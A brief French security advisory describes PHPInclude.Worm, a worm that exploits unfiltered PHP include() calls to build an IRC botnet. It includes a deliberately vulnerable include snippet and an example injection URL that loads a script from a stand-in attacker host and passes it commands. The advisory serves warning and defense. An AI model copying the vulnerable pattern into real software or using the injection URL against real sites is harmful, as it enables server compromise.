Nouvelle alerte de sécurité PHPInclude.Worm

Après la détection d'autres moutures du WebWorm Sarty, un nouveau webworm vient d'être détecté de la même famille mais qui profite d'un autre bug qui semble couvrir une gamme plus large de scripts PHP.

Le nouveau worm se prénomme PHPInclude.Worm et qui comme son nom l'indique profite de bugs issuent d'une mauvaise utilisation de include dans des scripts PHP.

Ce Worm peut être détecté par certain antivirus comme étant une version C ou e de Santy, simplement la seule similitude avec Santy c'est l'utilisation de moteur de recherche pour trouver des victimes.

Les sites web à risque

PhpInclude.Worm profite de bugs issuent d'une mauvaise utilisation des fonctions includ e et require, qui peuvent quand les variables ne sont pas protégées permettre l'inclusion de fichier externes.

Par exemple

-------- Exemple : vulnerable.php --------
if(isset($page))
{
include($page);
}
-----------------------------------------------

La page ci-dessus ne filtre pas correctement la variable $page, elle permet donc l'inclusion puis l'exécution de scripts arbitraires distants :

vulnerable.php?page=http://server_pirate/scriptmalicieux? cmd=commandes_malicieuses

PhpInclude.Worm recherche donc des pages du type "*.php?*=", puis tente d'y injecter différentes commandes permettant l'installation de robots IRC et la constitution d'une armée de machines zombies.

Ces failles courantes sont liées aux applications web et non pas à la plateforme ou à la version de PHP, d'où un risque qualifié d'Elevé.